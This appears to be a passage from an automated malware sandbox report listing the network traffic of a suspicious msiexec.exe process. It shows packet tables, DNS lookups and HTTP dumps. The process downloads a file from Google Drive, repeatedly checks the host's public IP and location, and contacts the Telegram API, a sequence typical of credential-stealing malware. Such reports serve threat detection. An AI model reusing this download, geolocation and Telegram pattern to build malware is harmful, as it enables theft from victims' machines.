                                                                                                                              Jan 10, 2025 23:11:32.282628059 CET5001380192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:32.286525011 CET8050011132.226.247.73192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:32.286592960 CET5001180192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:32.287422895 CET8050013132.226.247.73192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:32.287509918 CET5001380192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:32.287682056 CET5001380192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:32.292610884 CET8050013132.226.247.73192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:32.972223997 CET8050013132.226.247.73192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:32.973689079 CET50014443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:32.973735094 CET44350014104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:32.973809004 CET50014443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:32.974097013 CET50014443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:32.974108934 CET44350014104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:33.011756897 CET5001380192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:33.427570105 CET44350014104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:33.429339886 CET50014443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:33.429363966 CET44350014104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:33.582782984 CET44350014104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:33.582875013 CET44350014104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:33.582923889 CET50014443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:33.583348036 CET50014443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:33.588479042 CET5001380192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:33.589061975 CET5001580192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:33.593485117 CET8050013132.226.247.73192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:33.593539000 CET5001380192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:33.593899012 CET8050015132.226.247.73192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:33.593961000 CET5001580192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:33.594038010 CET5001580192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:33.598822117 CET8050015132.226.247.73192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:34.325052023 CET8050015132.226.247.73192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:34.326406956 CET50016443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:34.326453924 CET44350016104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:34.326839924 CET50016443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:34.326839924 CET50016443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:34.326875925 CET44350016104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:34.371117115 CET5001580192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:34.778981924 CET44350016104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:34.780896902 CET50016443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:34.780919075 CET44350016104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:34.912080050 CET44350016104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:34.912137032 CET44350016104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:34.912353039 CET50016443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:34.912776947 CET50016443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:34.921787977 CET5001580192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:34.922790051 CET5001780192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:34.926866055 CET8050015132.226.247.73192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:34.926934004 CET5001580192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:34.927582979 CET8050017132.226.247.73192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:34.927659035 CET5001780192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:34.927735090 CET5001780192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:34.932512999 CET8050017132.226.247.73192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:35.599380970 CET8050017132.226.247.73192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:35.600720882 CET50018443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:35.600785017 CET44350018104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:35.600874901 CET50018443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:35.601141930 CET50018443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:35.601155996 CET44350018104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:35.652362108 CET5001780192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:36.055147886 CET44350018104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:36.056875944 CET50018443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:36.056895971 CET44350018104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:36.178507090 CET44350018104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:36.178606033 CET44350018104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:36.178685904 CET50018443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:36.179258108 CET50018443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:36.182298899 CET5001780192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:36.183227062 CET5001980192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:36.187269926 CET8050017132.226.247.73192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:36.187321901 CET5001780192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:36.188064098 CET8050019132.226.247.73192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:36.188124895 CET5001980192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:36.188204050 CET5001980192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:36.192944050 CET8050019132.226.247.73192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:36.888720036 CET8050019132.226.247.73192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:36.890197039 CET50020443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:36.890254974 CET44350020104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:36.890345097 CET50020443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:36.890611887 CET50020443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:36.890624046 CET44350020104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:36.933659077 CET5001980192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:37.365066051 CET44350020104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:37.367352962 CET50020443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:37.367384911 CET44350020104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:37.493031025 CET44350020104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:37.493109941 CET44350020104.21.112.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:37.493335009 CET50020443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:37.494044065 CET50020443192.168.2.4104.21.112.1
                                                                                                                              Jan 10, 2025 23:11:37.536777973 CET5001980192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:37.542714119 CET8050019132.226.247.73192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:37.542895079 CET5001980192.168.2.4132.226.247.73
                                                                                                                              Jan 10, 2025 23:11:37.546525002 CET50021443192.168.2.4149.154.167.220
                                                                                                                              Jan 10, 2025 23:11:37.546571970 CET44350021149.154.167.220192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:37.546629906 CET50021443192.168.2.4149.154.167.220
                                                                                                                              Jan 10, 2025 23:11:37.547364950 CET50021443192.168.2.4149.154.167.220
                                                                                                                              Jan 10, 2025 23:11:37.547375917 CET44350021149.154.167.220192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:38.179574966 CET44350021149.154.167.220192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:38.181405067 CET50021443192.168.2.4149.154.167.220
                                                                                                                              Jan 10, 2025 23:11:38.183329105 CET50021443192.168.2.4149.154.167.220
                                                                                                                              Jan 10, 2025 23:11:38.183339119 CET44350021149.154.167.220192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:38.183590889 CET44350021149.154.167.220192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:38.185342073 CET50021443192.168.2.4149.154.167.220
                                                                                                                              Jan 10, 2025 23:11:38.227333069 CET44350021149.154.167.220192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:38.423115969 CET44350021149.154.167.220192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:38.423211098 CET44350021149.154.167.220192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:38.423326015 CET50021443192.168.2.4149.154.167.220
                                                                                                                              Jan 10, 2025 23:11:38.426109076 CET50021443192.168.2.4149.154.167.220
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Jan 10, 2025 23:11:19.592860937 CET5002253192.168.2.41.1.1.1
                                                                                                                              Jan 10, 2025 23:11:19.599718094 CET53500221.1.1.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:20.986162901 CET5509453192.168.2.41.1.1.1
                                                                                                                              Jan 10, 2025 23:11:20.993937016 CET53550941.1.1.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:25.489065886 CET5042853192.168.2.41.1.1.1
                                                                                                                              Jan 10, 2025 23:11:25.495690107 CET53504281.1.1.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:26.764102936 CET5530253192.168.2.41.1.1.1
                                                                                                                              Jan 10, 2025 23:11:26.771214008 CET53553021.1.1.1192.168.2.4
                                                                                                                              Jan 10, 2025 23:11:37.536683083 CET5696353192.168.2.41.1.1.1
                                                                                                                              Jan 10, 2025 23:11:37.544399977 CET53569631.1.1.1192.168.2.4
                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Jan 10, 2025 23:11:19.592860937 CET192.168.2.41.1.1.10x52bbStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                              Jan 10, 2025 23:11:20.986162901 CET192.168.2.41.1.1.10x1656Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                              Jan 10, 2025 23:11:25.489065886 CET192.168.2.41.1.1.10xd2baStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                              Jan 10, 2025 23:11:26.764102936 CET192.168.2.41.1.1.10x5e25Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                              Jan 10, 2025 23:11:37.536683083 CET192.168.2.41.1.1.10xac5eStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Jan 10, 2025 23:11:19.599718094 CET1.1.1.1192.168.2.40x52bbNo error (0)drive.google.com142.250.185.206A (IP address)IN (0x0001)false
                                                                                                                              Jan 10, 2025 23:11:20.993937016 CET1.1.1.1192.168.2.40x1656No error (0)drive.usercontent.google.com142.250.184.193A (IP address)IN (0x0001)false
                                                                                                                              Jan 10, 2025 23:11:25.495690107 CET1.1.1.1192.168.2.40xd2baNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Jan 10, 2025 23:11:25.495690107 CET1.1.1.1192.168.2.40xd2baNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                              Jan 10, 2025 23:11:25.495690107 CET1.1.1.1192.168.2.40xd2baNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                              Jan 10, 2025 23:11:25.495690107 CET1.1.1.1192.168.2.40xd2baNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                              Jan 10, 2025 23:11:25.495690107 CET1.1.1.1192.168.2.40xd2baNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                              Jan 10, 2025 23:11:25.495690107 CET1.1.1.1192.168.2.40xd2baNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                              Jan 10, 2025 23:11:26.771214008 CET1.1.1.1192.168.2.40x5e25No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                              Jan 10, 2025 23:11:26.771214008 CET1.1.1.1192.168.2.40x5e25No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                              Jan 10, 2025 23:11:26.771214008 CET1.1.1.1192.168.2.40x5e25No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                              Jan 10, 2025 23:11:26.771214008 CET1.1.1.1192.168.2.40x5e25No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                              Jan 10, 2025 23:11:26.771214008 CET1.1.1.1192.168.2.40x5e25No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                              Jan 10, 2025 23:11:26.771214008 CET1.1.1.1192.168.2.40x5e25No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                              Jan 10, 2025 23:11:26.771214008 CET1.1.1.1192.168.2.40x5e25No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                              Jan 10, 2025 23:11:37.544399977 CET1.1.1.1192.168.2.40xac5eNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                              • drive.google.com
                                                                                                                              • drive.usercontent.google.com
                                                                                                                              • reallyfreegeoip.org
                                                                                                                              • api.telegram.org
                                                                                                                              • checkip.dyndns.org
                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.450004132.226.247.73803192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Jan 10, 2025 23:11:25.504414082 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Jan 10, 2025 23:11:26.210196972 CET273INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 10 Jan 2025 22:11:26 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                              Jan 10, 2025 23:11:26.217849016 CET127OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Jan 10, 2025 23:11:26.433708906 CET273INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 10 Jan 2025 22:11:26 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                              Jan 10, 2025 23:11:27.399666071 CET127OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Jan 10, 2025 23:11:27.613913059 CET273INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 10 Jan 2025 22:11:27 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.450007132.226.247.73803192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Jan 10, 2025 23:11:28.228861094 CET127OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Jan 10, 2025 23:11:28.905448914 CET273INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 10 Jan 2025 22:11:28 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.450009132.226.247.73803192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Jan 10, 2025 23:11:29.566684961 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Jan 10, 2025 23:11:30.284703016 CET273INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 10 Jan 2025 22:11:30 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.450011132.226.247.73803192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Jan 10, 2025 23:11:30.911643028 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Jan 10, 2025 23:11:31.671853065 CET273INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 10 Jan 2025 22:11:31 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.450013132.226.247.73803192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Jan 10, 2025 23:11:32.287682056 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Jan 10, 2025 23:11:32.972223997 CET273INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 10 Jan 2025 22:11:32 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              5192.168.2.450015132.226.247.73803192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Jan 10, 2025 23:11:33.594038010 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Jan 10, 2025 23:11:34.325052023 CET273INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 10 Jan 2025 22:11:34 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              6192.168.2.450017132.226.247.73803192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Jan 10, 2025 23:11:34.927735090 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Jan 10, 2025 23:11:35.599380970 CET273INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 10 Jan 2025 22:11:35 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              7192.168.2.450019132.226.247.73803192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Jan 10, 2025 23:11:36.188204050 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Jan 10, 2025 23:11:36.888720036 CET273INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 10 Jan 2025 22:11:36 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.450002142.250.185.2064433192C:\Windows\SysWOW64\msiexec.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2025-01-10 22:11:20 UTC216OUTGET /uc?export=download&id=1tTuCtWc8QWxmudjTRrFkrhq7MJC0UzWJ HTTP/1.1
